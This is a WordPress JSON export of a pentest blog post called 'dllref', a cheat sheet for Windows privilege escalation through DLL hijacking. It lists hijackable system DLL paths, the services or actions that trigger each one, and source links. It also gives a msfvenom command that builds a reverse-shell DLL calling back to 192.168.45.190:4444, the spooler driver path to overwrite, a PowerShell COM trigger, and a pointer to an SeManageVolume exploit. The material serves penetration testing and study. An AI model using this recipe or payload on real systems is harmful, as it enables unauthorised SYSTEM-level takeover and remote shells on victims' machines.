{"id":562,"date":"2023-07-08T14:47:50","date_gmt":"2023-07-08T14:47:50","guid":{"rendered":"https:\/\/sirensecurity.io\/blog\/?p=562"},"modified":"2023-07-08T14:57:58","modified_gmt":"2023-07-08T14:57:58","slug":"dllref","status":"publish","type":"post","link":"https:\/\/sirensecurity.io\/blog\/dllref\/","title":{"rendered":"dllref"},"content":{"rendered":"\n<div class=\"wp-block-cover\"><span aria-hidden=\"true\" class=\"wp-block-cover__background has-background-dim\"><\/span><img loading=\"lazy\" decoding=\"async\" width=\"1456\" height=\"816\" class=\"wp-block-cover__image-background wp-image-566\" alt=\"\" src=\"https:\/\/sirensecurity.io\/blog\/wp-content\/uploads\/2023\/07\/dllref.png\" data-object-fit=\"cover\"\/><div class=\"wp-block-cover__inner-container is-layout-flow wp-block-cover-is-layout-flow\">\n<p class=\"has-text-align-center has-large-font-size\">dllref - Windows Privilege Escalation &amp; DLL Triggers.<\/p>\n<\/div><\/div>\n\n\n\n<p><strong>.bashrc<\/strong><br>alias dllref='clear ; cat $HOME\/ref\/dllref'<\/p>\n\n\n\n<p><em>This is potentially an incomplete list.<\/em><\/p>\n\n\n\n<p><strong>dllref (flat file):<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>=================================================================================\nC:\\Windows\\System32\\wpcoreutil.dll (Windows Insider service `wisvc` triggered by clicking Start Windows Insider Program)\n=================================================================================\nC:\\Windows\\System32\\phoneinfo.dll (Windows Problem Reporting service)\nhttps:\/\/twitter.com\/404death\/status\/1262670619067334656  (without reboot by @jonasLyk)\n=================================================================================\n#dxgi - Trigger is check for protection update\nC:\\Windows\\System32\\wbem\\dxgi.dll  (windows security -> check for protection 
update)\n=================================================================================\n#tzres.dll\nC:\\Windows\\System32\\wbem\\tzres.dll (systeminfo, NetworkService) \n=================================================================================\n### Need to reboot to get NT AUTHORITY\\SYSTEM (hijack dll) ###\nC:\\Windows\\System32\\wlbsctrl.dll (IKEEXT service)\nC:\\Windows\\System32\\wbem\\wbemcomn.dll (IP Helper)\n=================================================================================\nC:\\Windows\\System32\\ualapi.dll (spooler service)\nhttp:&#47;&#47;www.hexacorn.com\/blog\/2016\/11\/08\/beyond-good-ol-run-key-part-50\/\n=================================================================================\nC:\\Windows\\System32\\fveapi.dll (ShellHWDetection Service)  @bohops\n=================================================================================\nC:\\Windows\\System32\\Wow64Log.dll (this dll loaded by other third party services such as GoogleUpdate.exe)\nhttp:\/\/waleedassar.blogspot.com\/2013\/01\/wow64logdll.html\n=================================================================================\n#DLL\nmsfvenom -a x64 -p windows\/x64\/shell_reverse_tcp LHOST=192.168.45.190 LPORT=4444 -f dll -o Printconfig.dll\n\n#Overwrite:\nC:\\Windows\\System32\\spool\\drivers\\x64\\3\\\n\n#Trigger\n$type = &#91;Type]::GetTypeFromCLSID(\"{854A20FB-2D44-457D-992F-EF13785D2B51}\")\n$object = &#91;Activator]::CreateInstance($type)\n=================================================================================\n#ALL ABOVE REQUIRE ADMIN READ\/WRITE\nhttps:\/\/github.com\/CsEnox\/SeManageVolumeExploit\/\nSeManageVolumeExploit.exe\n=================================================================================\n<\/code><\/pre>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>.bashrcalias dllref='clear ; cat $HOME\/ref\/dllref' This is potentially an incomplete list. 
dllref (flat file):<\/p>\n","protected":false},"author":1,"featured_media":566,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[91,89,88,12,4,90,93,92],"class_list":["post-562","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-s1ren","tag-dll-hijacking","tag-dll-reference","tag-dllref","tag-pentest","tag-s1ren","tag-windows-dll-hijacking","tag-windows-privesc","tag-windows-privilege-escalation"],"_links":{"self":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/562","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/comments?post=562"}],"version-history":[{"count":6,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/562\/revisions"}],"predecessor-version":[{"id":571,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/562\/revisions\/571"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/media\/566"}],"wp:attachment":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/media?parent=562"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/categories?post=562"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/tags?post=562"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}